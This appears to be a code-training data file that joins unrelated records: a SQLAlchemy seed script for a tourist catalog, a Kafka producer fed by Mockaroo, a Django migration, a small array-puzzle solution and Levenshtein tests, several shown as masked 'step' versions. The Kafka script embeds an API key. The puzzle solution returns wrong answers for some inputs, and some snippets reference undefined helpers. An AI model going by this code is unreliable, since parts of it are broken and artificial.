# Creating a user that owns every catalog entry below.
user_1 = _insert(Users(name="admin", email="admin@admin.com"))

# The eight countries, inserted in the original order so that the
# auto-generated primary keys are unchanged.
country_1 = _insert(Country(user_id=1, name="India"))
country_2 = _insert(Country(user_id=1, name="Australia"))
country_3 = _insert(Country(user_id=1, name="England"))
country_4 = _insert(Country(user_id=1, name="Paris"))
country_5 = _insert(Country(user_id=1, name="USA"))
country_6 = _insert(Country(user_id=1, name="Mexico"))
country_7 = _insert(Country(user_id=1, name="Srilanka"))
country_8 = _insert(Country(user_id=1, name="Maldives"))

# (name, description, country) rows for the tourist attractions; the
# description text is preserved byte-for-byte from the original seed data.
_attractions = [
    ("Taj Mahal",
     "Taj Mahal is mausolem by Mughal ruler Shah Jahan for his Wife Mumtaz Mahal "
     "It is bultby using white marbel",
     country_1),
    ("Red Fort",
     "Red fort is the histroric fort in the city of Delhi,India."
     "It is the main residence of the emperors of mughal Dynasty.",
     country_1),
    ("Canberra",
     "It is the home for National GAllery of Australia"
     "and a wide varierty of cultural and historic sites",
     country_2),
    ("Perth",
     "The west side ofAustralia is home to the city of Perth"
     "It is bordered by Indian Ocean",
     country_2),
    ("Tower Of London",
     "It is one of the world Heritage site"
     "Other highlights are Crown Jewels Exhibition",
     country_3),
    ("British Museum",
     "It contains the collection of worlds finest antiquites"
     "The famous artifacts are Eglin marbles",
     country_3),
    ("Eiffel Tower",
     "The Eiffel-tower is wrought iron lattice"
     "It is named after the Engineer Gustav Eiffel",
     country_4),
    ("places of Versallies",
     "The Palce of Versallies is the Principle Royal"
     "residence.",
     country_4),
    ("Grand Canyon Village",
     "Grand Canyon is located in south Rim of Grand Canyon"
     "It is focussed on accomadating tourists visiting Grand Canyon",
     country_5),
    ("Statue if Liberty",
     "Statue of Liberty is Colossal neo-classical sculpture"
     "In New-york Hourbor Newyork",
     country_5),
    ("Mexico City",
     "Mexico city is densely populated and high altitude capital Of Mexico"
     "It is the home for zoo,Muesuem of modern Art.",
     country_6),
    ("Tulum",
     "Tulum is a town in the Carribean coatline of Mexico"
     "It is well-known for beaches and ruins of Ancient Mayan port city",
     country_6),
    ("Colombo",
     "It is the Capital city of Srilanka"
     "It sheritage is reflected in its Architecture",
     country_7),
    ("Kandy",
     "Kandy is the largest city of central Sri Lanka."
     "It is surrounded by mountains which is home to tea Plantations.",
     country_7),
    ("Male",
     "It is among the tooped tourist Attractions of Maldives"
     "It has considerably moderate tempaerature through out the year",
     country_8),
    ("Sun Island",
     "It is adorned with some sparkling beaches"
     "beuatigul flowers and lavish greenary that pulls a great number of tourists",
     country_8),
]
for _name, _description, _country in _attractions:
    places = _insert(TouristPlaces(user_id=1, name=_name,
                                   description=_description,
                                   country=_country))

print("added countries and Tourist Places added")
|
flexible
|
{
"blob_id": "21b9844fce10d16a14050a782ce7e15e3f6fb657",
"index": 5737,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsession.add(user_1)\nsession.commit()\n<mask token>\nsession.add(country_1)\nsession.commit()\n<mask token>\nsession.add(country_2)\nsession.commit()\n<mask token>\nsession.add(country_3)\nsession.commit()\n<mask token>\nsession.add(country_4)\nsession.commit()\n<mask token>\nsession.add(country_5)\nsession.commit()\n<mask token>\nsession.add(country_6)\nsession.commit()\n<mask token>\nsession.add(country_7)\nsession.commit()\n<mask token>\nsession.add(country_8)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\nprint('added countries and Tourist Places added')\n",
"step-3": "<mask token>\nengine = create_engine('sqlite:///country_catalog.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\nuser_1 = Users(name='admin', email='admin@admin.com')\nsession.add(user_1)\nsession.commit()\ncountry_1 = Country(user_id=1, name='India')\nsession.add(country_1)\nsession.commit()\ncountry_2 = Country(user_id=1, name='Australia')\nsession.add(country_2)\nsession.commit()\ncountry_3 = Country(user_id=1, name='England')\nsession.add(country_3)\nsession.commit()\ncountry_4 = Country(user_id=1, name='Paris')\nsession.add(country_4)\nsession.commit()\ncountry_5 = Country(user_id=1, name='USA')\nsession.add(country_5)\nsession.commit()\ncountry_6 = Country(user_id=1, name='Mexico')\nsession.add(country_6)\nsession.commit()\ncountry_7 = Country(user_id=1, name='Srilanka')\nsession.add(country_7)\nsession.commit()\ncountry_8 = Country(user_id=1, name='Maldives')\nsession.add(country_8)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Taj Mahal', description=\n 'Taj Mahal is mausolem by Mughal ruler Shah Jahan for his Wife Mumtaz Mahal It is bultby using white marbel'\n , country=country_1)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Red Fort', description=\n 'Red fort is the histroric fort in the city of Delhi,India.It is the main residence of the emperors of mughal Dynasty.'\n , country=country_1)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Canberra', description=\n 'It is the home for National GAllery of Australiaand a wide varierty of cultural and historic sites'\n , country=country_2)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Perth', description=\n 'The west side ofAustralia is home to the city of PerthIt is bordered by Indian Ocean'\n , country=country_2)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Tower Of London', description=\n 'It is one of 
the world Heritage siteOther highlights are Crown Jewels Exhibition'\n , country=country_3)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='British Museum', description=\n 'It contains the collection of worlds finest antiquitesThe famous artifacts are Eglin marbles'\n , country=country_3)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Eiffel Tower', description=\n 'The Eiffel-tower is wrought iron latticeIt is named after the Engineer Gustav Eiffel'\n , country=country_4)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='places of Versallies', description=\n 'The Palce of Versallies is the Principle Royalresidence.', country=\n country_4)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Grand Canyon Village', description=\n 'Grand Canyon is located in south Rim of Grand CanyonIt is focussed on accomadating tourists visiting Grand Canyon'\n , country=country_5)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Statue if Liberty', description=\n 'Statue of Liberty is Colossal neo-classical sculptureIn New-york Hourbor Newyork'\n , country=country_5)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Mexico City', description=\n 'Mexico city is densely populated and high altitude capital Of MexicoIt is the home for zoo,Muesuem of modern Art.'\n , country=country_6)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Tulum', description=\n 'Tulum is a town in the Carribean coatline of MexicoIt is well-known for beaches and ruins of Ancient Mayan port city'\n , country=country_6)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Colombo', description=\n 'It is the Capital city of SrilankaIt sheritage is reflected in its Architecture'\n , country=country_7)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, 
name='Kandy', description=\n 'Kandy is the largest city of central Sri Lanka.It is surrounded by mountains which is home to tea Plantations.'\n , country=country_7)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Male', description=\n 'It is among the tooped tourist Attractions of MaldivesIt has considerably moderate tempaerature through out the year'\n , country=country_8)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Sun Island', description=\n 'It is adorned with some sparkling beachesbeuatigul flowers and lavish greenary that pulls a great number of tourists'\n , country=country_8)\nsession.add(places)\nsession.commit()\nprint('added countries and Tourist Places added')\n",
"step-4": "from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Country, TouristPlaces, Users\nengine = create_engine('sqlite:///country_catalog.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\nuser_1 = Users(name='admin', email='admin@admin.com')\nsession.add(user_1)\nsession.commit()\ncountry_1 = Country(user_id=1, name='India')\nsession.add(country_1)\nsession.commit()\ncountry_2 = Country(user_id=1, name='Australia')\nsession.add(country_2)\nsession.commit()\ncountry_3 = Country(user_id=1, name='England')\nsession.add(country_3)\nsession.commit()\ncountry_4 = Country(user_id=1, name='Paris')\nsession.add(country_4)\nsession.commit()\ncountry_5 = Country(user_id=1, name='USA')\nsession.add(country_5)\nsession.commit()\ncountry_6 = Country(user_id=1, name='Mexico')\nsession.add(country_6)\nsession.commit()\ncountry_7 = Country(user_id=1, name='Srilanka')\nsession.add(country_7)\nsession.commit()\ncountry_8 = Country(user_id=1, name='Maldives')\nsession.add(country_8)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Taj Mahal', description=\n 'Taj Mahal is mausolem by Mughal ruler Shah Jahan for his Wife Mumtaz Mahal It is bultby using white marbel'\n , country=country_1)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Red Fort', description=\n 'Red fort is the histroric fort in the city of Delhi,India.It is the main residence of the emperors of mughal Dynasty.'\n , country=country_1)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Canberra', description=\n 'It is the home for National GAllery of Australiaand a wide varierty of cultural and historic sites'\n , country=country_2)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Perth', description=\n 'The west side ofAustralia is home to the city of PerthIt is bordered by Indian Ocean'\n , 
country=country_2)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Tower Of London', description=\n 'It is one of the world Heritage siteOther highlights are Crown Jewels Exhibition'\n , country=country_3)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='British Museum', description=\n 'It contains the collection of worlds finest antiquitesThe famous artifacts are Eglin marbles'\n , country=country_3)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Eiffel Tower', description=\n 'The Eiffel-tower is wrought iron latticeIt is named after the Engineer Gustav Eiffel'\n , country=country_4)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='places of Versallies', description=\n 'The Palce of Versallies is the Principle Royalresidence.', country=\n country_4)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Grand Canyon Village', description=\n 'Grand Canyon is located in south Rim of Grand CanyonIt is focussed on accomadating tourists visiting Grand Canyon'\n , country=country_5)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Statue if Liberty', description=\n 'Statue of Liberty is Colossal neo-classical sculptureIn New-york Hourbor Newyork'\n , country=country_5)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Mexico City', description=\n 'Mexico city is densely populated and high altitude capital Of MexicoIt is the home for zoo,Muesuem of modern Art.'\n , country=country_6)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Tulum', description=\n 'Tulum is a town in the Carribean coatline of MexicoIt is well-known for beaches and ruins of Ancient Mayan port city'\n , country=country_6)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Colombo', description=\n 'It is the Capital city of 
SrilankaIt sheritage is reflected in its Architecture'\n , country=country_7)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Kandy', description=\n 'Kandy is the largest city of central Sri Lanka.It is surrounded by mountains which is home to tea Plantations.'\n , country=country_7)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Male', description=\n 'It is among the tooped tourist Attractions of MaldivesIt has considerably moderate tempaerature through out the year'\n , country=country_8)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Sun Island', description=\n 'It is adorned with some sparkling beachesbeuatigul flowers and lavish greenary that pulls a great number of tourists'\n , country=country_8)\nsession.add(places)\nsession.commit()\nprint('added countries and Tourist Places added')\n",
"step-5": "from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Country, TouristPlaces, Users\n\n# Create database and create a shortcut for easier to update database\nengine = create_engine('sqlite:///country_catalog.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n# Creating an user\nuser_1 = Users(name=\"admin\", email=\"admin@admin.com\")\nsession.add(user_1)\nsession.commit()\n\n# India\ncountry_1 = Country(user_id=1, name=\"India\")\nsession.add(country_1)\nsession.commit()\n\n\n# Australia\ncountry_2 = Country(user_id=1, name=\"Australia\")\nsession.add(country_2)\nsession.commit()\n\n# England\ncountry_3 = Country(user_id=1, name=\"England\")\nsession.add(country_3)\nsession.commit()\n\n# Paris\ncountry_4 = Country(user_id=1, name=\"Paris\")\nsession.add(country_4)\nsession.commit()\n\n# USA\ncountry_5 = Country(user_id=1, name=\"USA\")\nsession.add(country_5)\nsession.commit()\n\n# Mexico\ncountry_6 = Country(user_id=1, name=\"Mexico\")\nsession.add(country_6)\nsession.commit()\n\n# SriLanka\ncountry_7 = Country(user_id=1, name=\"Srilanka\")\nsession.add(country_7)\nsession.commit()\n\n# MAldives\ncountry_8 = Country(user_id=1, name=\"Maldives\")\nsession.add(country_8)\nsession.commit()\n\n# Adding touristAttractions to Countries\nplaces = TouristPlaces(user_id=1, name=\"Taj Mahal\",\n description=\"Taj Mahal is mausolem by Mughal ruler Shah Jahan for his Wife Mumtaz Mahal \"\n \"It is bultby using white marbel\",\n country=country_1)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Red Fort\",\n description=\"Red fort is the histroric fort in the city of Delhi,India.\"\n \"It is the main residence of the emperors of mughal Dynasty.\",\n country=country_1)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Canberra\",\n description=\"It is the home for National GAllery of 
Australia\"\n \"and a wide varierty of cultural and historic sites\",\n country=country_2)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Perth\",\n description=\"The west side ofAustralia is home to the city of Perth\"\n \"It is bordered by Indian Ocean\",\n country=country_2)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Tower Of London\",\n description=\"It is one of the world Heritage site\"\n \"Other highlights are Crown Jewels Exhibition\",\n country=country_3)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"British Museum\",\n description=\"It contains the collection of worlds finest antiquites\"\n \"The famous artifacts are Eglin marbles\",\n country=country_3)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Eiffel Tower\",\n description=\"The Eiffel-tower is wrought iron lattice\"\n \"It is named after the Engineer Gustav Eiffel\",\n country=country_4)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"places of Versallies\",\n description=\"The Palce of Versallies is the Principle Royal\"\n \"residence.\",\n country=country_4)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Grand Canyon Village\",\n description=\"Grand Canyon is located in south Rim of Grand Canyon\"\n \"It is focussed on accomadating tourists visiting Grand Canyon\",\n country=country_5)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Statue if Liberty\",\n description=\"Statue of Liberty is Colossal neo-classical sculpture\"\n \"In New-york Hourbor Newyork\",\n country=country_5)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Mexico City\",\n description=\"Mexico city is densely populated and high altitude capital Of Mexico\"\n \"It is the home for zoo,Muesuem of modern Art.\",\n 
country=country_6)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Tulum\",\n description=\"Tulum is a town in the Carribean coatline of Mexico\"\n \"It is well-known for beaches and ruins of Ancient Mayan port city\",\n country=country_6)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Colombo\",\n description=\"It is the Capital city of Srilanka\"\n \"It sheritage is reflected in its Architecture\",\n country=country_7)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Kandy\",\n description=\"Kandy is the largest city of central Sri Lanka.\"\n \"It is surrounded by mountains which is home to tea Plantations.\",\n country=country_7)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Male\",\n description=\"It is among the tooped tourist Attractions of Maldives\"\n \"It has considerably moderate tempaerature through out the year\",\n country=country_8)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Sun Island\",\n description=\"It is adorned with some sparkling beaches\"\n \"beuatigul flowers and lavish greenary that pulls a great number of tourists\",\n country=country_8)\nsession.add(places)\nsession.commit()\n\nprint(\"added countries and Tourist Places added\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
"""Produce mock user records fetched from Mockaroo into a Confluent
Cloud Kafka topic.  (The shebang belongs on the very first line; in the
original it sat after an import and had no effect.)"""
import json

import requests
from confluent_kafka import Producer, KafkaError

import ccloud_lib

# Running total of records acknowledged by the broker; incremented by the
# acked() delivery callback.
delivered_records = 0

# Mockaroo REST endpoint returning 1000 mock records as a JSON array.
# NOTE(review): the API key is embedded in the URL -- consider moving it
# to configuration or an environment variable.
url = "https://api.mockaroo.com/api/cbb61270?count=1000&key=5a40bdb0"
def acked(err, msg):
    """Per-message delivery report handler (triggered by poll() or flush()).

    On success, increments the module-level ``delivered_records`` counter
    and logs the destination topic/partition/offset; on permanent failure
    (after retries), logs the error instead.

    :param err: delivery error, or ``None`` on success.
    :param msg: the delivered message (provides topic/partition/offset).
    """
    # The docstring must be the first statement in the function body; in
    # the original it followed the ``global`` statement and was discarded.
    global delivered_records
    if err is not None:
        print("Failed to deliver message: {}".format(err))
    else:
        delivered_records += 1
        print("Produced record to topic {} partition [{}] @ offset {}"
              .format(msg.topic(), msg.partition(), msg.offset()))
def get_data():
    """Fetch one batch of mock records from Mockaroo and wrap the returned
    JSON array in a ``{ "data": [...] }`` envelope string.

    The Mockaroo schema must be configured to output an array.
    """
    response = requests.get(url)
    return '{ "data": ' + str(response.text) + '}'
def main():
# Read arguments and configurations and initialize
args = ccloud_lib.parse_args()
config_file = args.config_file
topic = args.topic
conf = ccloud_lib.read_ccloud_config(config_file)
# Create Producer instance
producer_conf = ccloud_lib.pop_schema_registry_params_from_config(conf)
producer = Producer(producer_conf)
# Create topic if needed
ccloud_lib.create_topic(conf, topic)
print("hello world")
d = get_data()
djson = json.loads(d)
darray = djson['data']
for item in darray:
record_key = str(item['_id'])
record_value = json.dumps(item)
print(record_value)
producer.produce(topic, key=record_key, value=record_value, on_delivery=acked)
producer.poll(0)
producer.flush()
print("{} messages were produced to topic {}!".format(delivered_records, topic))
if __name__ == '__main__':
main()
# to run program
# python user_purchases_to_kafka.py -f ~/.confluent/python.config -t user_purchases
# python user_activity_to_kafka.py -f ~/.confluent/python.config -t user_activity
|
normal
|
{
"blob_id": "b4f522398cd2658c2db926216e974781e10c44df",
"index": 7897,
"step-1": "<mask token>\n\n\ndef get_data():\n r = requests.get(url)\n return '{ \"data\": ' + str(r.text) + '}'\n\n\ndef main():\n args = ccloud_lib.parse_args()\n config_file = args.config_file\n topic = args.topic\n conf = ccloud_lib.read_ccloud_config(config_file)\n producer_conf = ccloud_lib.pop_schema_registry_params_from_config(conf)\n producer = Producer(producer_conf)\n ccloud_lib.create_topic(conf, topic)\n print('hello world')\n d = get_data()\n djson = json.loads(d)\n darray = djson['data']\n for item in darray:\n record_key = str(item['_id'])\n record_value = json.dumps(item)\n print(record_value)\n producer.produce(topic, key=record_key, value=record_value,\n on_delivery=acked)\n producer.poll(0)\n producer.flush()\n print('{} messages were produced to topic {}!'.format(delivered_records,\n topic))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef acked(err, msg):\n global delivered_records\n \"\"\"Delivery report handler called on\n successful or failed delivery of message\n \"\"\"\n if err is not None:\n print('Failed to deliver message: {}'.format(err))\n else:\n delivered_records += 1\n print('Produced record to topic {} partition [{}] @ offset {}'.\n format(msg.topic(), msg.partition(), msg.offset()))\n\n\ndef get_data():\n r = requests.get(url)\n return '{ \"data\": ' + str(r.text) + '}'\n\n\ndef main():\n args = ccloud_lib.parse_args()\n config_file = args.config_file\n topic = args.topic\n conf = ccloud_lib.read_ccloud_config(config_file)\n producer_conf = ccloud_lib.pop_schema_registry_params_from_config(conf)\n producer = Producer(producer_conf)\n ccloud_lib.create_topic(conf, topic)\n print('hello world')\n d = get_data()\n djson = json.loads(d)\n darray = djson['data']\n for item in darray:\n record_key = str(item['_id'])\n record_value = json.dumps(item)\n print(record_value)\n producer.produce(topic, key=record_key, value=record_value,\n on_delivery=acked)\n producer.poll(0)\n producer.flush()\n print('{} messages were produced to topic {}!'.format(delivered_records,\n topic))\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\ndelivered_records = 0\nurl = 'https://api.mockaroo.com/api/cbb61270?count=1000&key=5a40bdb0'\n\n\ndef acked(err, msg):\n global delivered_records\n \"\"\"Delivery report handler called on\n successful or failed delivery of message\n \"\"\"\n if err is not None:\n print('Failed to deliver message: {}'.format(err))\n else:\n delivered_records += 1\n print('Produced record to topic {} partition [{}] @ offset {}'.\n format(msg.topic(), msg.partition(), msg.offset()))\n\n\ndef get_data():\n r = requests.get(url)\n return '{ \"data\": ' + str(r.text) + '}'\n\n\ndef main():\n args = ccloud_lib.parse_args()\n config_file = args.config_file\n topic = args.topic\n conf = ccloud_lib.read_ccloud_config(config_file)\n producer_conf = ccloud_lib.pop_schema_registry_params_from_config(conf)\n producer = Producer(producer_conf)\n ccloud_lib.create_topic(conf, topic)\n print('hello world')\n d = get_data()\n djson = json.loads(d)\n darray = djson['data']\n for item in darray:\n record_key = str(item['_id'])\n record_value = json.dumps(item)\n print(record_value)\n producer.produce(topic, key=record_key, value=record_value,\n on_delivery=acked)\n producer.poll(0)\n producer.flush()\n print('{} messages were produced to topic {}!'.format(delivered_records,\n topic))\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import requests\nfrom confluent_kafka import Producer, KafkaError\nimport json\nimport ccloud_lib\ndelivered_records = 0\nurl = 'https://api.mockaroo.com/api/cbb61270?count=1000&key=5a40bdb0'\n\n\ndef acked(err, msg):\n global delivered_records\n \"\"\"Delivery report handler called on\n successful or failed delivery of message\n \"\"\"\n if err is not None:\n print('Failed to deliver message: {}'.format(err))\n else:\n delivered_records += 1\n print('Produced record to topic {} partition [{}] @ offset {}'.\n format(msg.topic(), msg.partition(), msg.offset()))\n\n\ndef get_data():\n r = requests.get(url)\n return '{ \"data\": ' + str(r.text) + '}'\n\n\ndef main():\n args = ccloud_lib.parse_args()\n config_file = args.config_file\n topic = args.topic\n conf = ccloud_lib.read_ccloud_config(config_file)\n producer_conf = ccloud_lib.pop_schema_registry_params_from_config(conf)\n producer = Producer(producer_conf)\n ccloud_lib.create_topic(conf, topic)\n print('hello world')\n d = get_data()\n djson = json.loads(d)\n darray = djson['data']\n for item in darray:\n record_key = str(item['_id'])\n record_value = json.dumps(item)\n print(record_value)\n producer.produce(topic, key=record_key, value=record_value,\n on_delivery=acked)\n producer.poll(0)\n producer.flush()\n print('{} messages were produced to topic {}!'.format(delivered_records,\n topic))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import requests\n#!/usr/bin/env python\n\nfrom confluent_kafka import Producer, KafkaError\nimport json\nimport ccloud_lib\n\ndelivered_records = 0\nurl = \"https://api.mockaroo.com/api/cbb61270?count=1000&key=5a40bdb0\"\n\n\n # Optional per-message on_delivery handler (triggered by poll() or flush())\n # when a message has been successfully delivered or\n # permanently failed delivery (after retries).\ndef acked(err, msg):\n global delivered_records\n \"\"\"Delivery report handler called on\n successful or failed delivery of message\n \"\"\"\n if err is not None:\n print(\"Failed to deliver message: {}\".format(err))\n else:\n delivered_records += 1\n print(\"Produced record to topic {} partition [{}] @ offset {}\"\n .format(msg.topic(), msg.partition(), msg.offset()))\n\n#get mockaroo data records\n#make sure mockaroo schema is set to output array\ndef get_data():\n r = requests.get(url)\n return '{ \"data\": ' + str(r.text) + '}'\n\ndef main():\n # Read arguments and configurations and initialize\n args = ccloud_lib.parse_args()\n config_file = args.config_file\n topic = args.topic\n conf = ccloud_lib.read_ccloud_config(config_file)\n\n # Create Producer instance\n producer_conf = ccloud_lib.pop_schema_registry_params_from_config(conf)\n producer = Producer(producer_conf)\n\n # Create topic if needed\n ccloud_lib.create_topic(conf, topic)\n\n print(\"hello world\")\n d = get_data()\n djson = json.loads(d)\n darray = djson['data']\n\n for item in darray:\n record_key = str(item['_id'])\n record_value = json.dumps(item)\n print(record_value)\n producer.produce(topic, key=record_key, value=record_value, on_delivery=acked)\n producer.poll(0)\n\n producer.flush()\n\n print(\"{} messages were produced to topic {}!\".format(delivered_records, topic))\n\n\nif __name__ == '__main__':\n main()\n\n\n# to run program\n# python user_purchases_to_kafka.py -f ~/.confluent/python.config -t user_purchases\n# python user_activity_to_kafka.py -f 
~/.confluent/python.config -t user_activity\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
# Generated by Django 2.1.3 on 2019-04-10 11:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0014_auto_20190409_1917'),
]
operations = [
migrations.AlterField(
model_name='article',
name='estArchive',
field=models.BooleanField(default=False, verbose_name="Archiver l'article"),
),
migrations.AlterField(
model_name='projet',
name='estArchive',
field=models.BooleanField(default=False, verbose_name='Archiver le projet'),
),
]
|
normal
|
{
"blob_id": "21c8078a18ee4579fa9b4b1b667d6ea0c1ce99b3",
"index": 6005,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('blog', '0014_auto_20190409_1917')]\n operations = [migrations.AlterField(model_name='article', name=\n 'estArchive', field=models.BooleanField(default=False, verbose_name\n =\"Archiver l'article\")), migrations.AlterField(model_name='projet',\n name='estArchive', field=models.BooleanField(default=False,\n verbose_name='Archiver le projet'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('blog', '0014_auto_20190409_1917')]\n operations = [migrations.AlterField(model_name='article', name=\n 'estArchive', field=models.BooleanField(default=False, verbose_name\n =\"Archiver l'article\")), migrations.AlterField(model_name='projet',\n name='estArchive', field=models.BooleanField(default=False,\n verbose_name='Archiver le projet'))]\n",
"step-5": "# Generated by Django 2.1.3 on 2019-04-10 11:04\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0014_auto_20190409_1917'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='article',\n name='estArchive',\n field=models.BooleanField(default=False, verbose_name=\"Archiver l'article\"),\n ),\n migrations.AlterField(\n model_name='projet',\n name='estArchive',\n field=models.BooleanField(default=False, verbose_name='Archiver le projet'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def solution(A):
if not A:
return 1
elif len(A) == 1:
if A[0] == 1:
return 2
else:
return 1
A.sort()
prev = 0
for i in A:
if i != (prev + 1):
return i - 1
else:
prev = i
return prev + 1
|
normal
|
{
"blob_id": "8c3c066ed37fe0f67acfd2d5dc9d57ec2b996275",
"index": 5640,
"step-1": "<mask token>\n",
"step-2": "def solution(A):\n if not A:\n return 1\n elif len(A) == 1:\n if A[0] == 1:\n return 2\n else:\n return 1\n A.sort()\n prev = 0\n for i in A:\n if i != prev + 1:\n return i - 1\n else:\n prev = i\n return prev + 1\n",
"step-3": "def solution(A):\n if not A:\n return 1\n elif len(A) == 1:\n if A[0] == 1:\n return 2\n else:\n return 1\n\n A.sort()\n prev = 0\n for i in A:\n if i != (prev + 1):\n return i - 1\n else:\n prev = i\n\n return prev + 1\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class Tests(unittest.TestCase):
def test_singleton(self):
lev1, lev2 = Levenshtein(), Levenshtein()
self.assertIs(lev1, lev2)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Tests(unittest.TestCase):
def test_singleton(self):
lev1, lev2 = Levenshtein(), Levenshtein()
self.assertIs(lev1, lev2)
def _mk_test_fn(fn, a, b, expected):
def _test_fn(self):
self.assertEqual(fn(a, b), expected)
self.assertEqual(fn(b, a), expected)
return _test_fn
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Tests(unittest.TestCase):
def test_singleton(self):
lev1, lev2 = Levenshtein(), Levenshtein()
self.assertIs(lev1, lev2)
def _mk_test_fn(fn, a, b, expected):
def _test_fn(self):
self.assertEqual(fn(a, b), expected)
self.assertEqual(fn(b, a), expected)
return _test_fn
for lev_fn, data in itertools.product(TEST_FUNCTIONS, TEST_DATA):
name, a, b, expected = data
test_fn = _mk_test_fn(lev_fn, a, b, expected)
